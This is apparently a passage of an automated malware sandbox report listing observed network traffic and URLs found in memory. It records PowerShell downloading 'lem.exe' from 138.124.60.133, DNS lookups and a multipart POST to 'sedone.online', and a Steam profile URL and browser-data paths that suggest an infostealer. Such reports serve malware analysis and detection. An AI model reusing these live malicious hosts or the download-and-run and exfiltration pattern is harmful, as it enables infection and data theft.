            Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
            Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
            Source: global traffic HTTP traffic detected: GET /lem.exe HTTP/1.1 Accept: */* Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 138.124.60.133 Connection: Keep-Alive
            Source: global traffic DNS traffic detected: DNS query: pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ
            Source: global traffic DNS traffic detected: DNS query: t.me
            Source: global traffic DNS traffic detected: DNS query: sedone.online
            Source: global traffic DNS traffic detected: DNS query: www.google.com
            Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----USR1V37900ZM7Q1DTJW4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
            Source: powershell.exe, 00000009.00000002.2121615791.0000017A76108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://138.124.60.133/lem.exe
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Colonial.16.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: svchost.exe, 0000001E.00000002.3005946928.000001DA290A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F08000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28F3D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.30.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
            Source: chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10302000.00000004.00000800.00020000.00000000.sdmp, putt.exe, 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, putt.exe, 00000010.00000000.2080718223.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, putt.exe.9.dr, lem[1].exe.9.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: Setup.msi, 625ebf.msi.1.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: Colonial.16.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Colonial.16.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Colonial.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Colonial.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Colonial.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Colonial.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Corrections.com, 0000001A.00000000.2135017638.0000000001015000.00000002.00000001.01000000.0000000D.sdmp, Appeals.16.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chrome.exe, 0000001D.00000003.2531156057.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
            Source: chrome.exe, 0000001D.00000003.2531156057.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
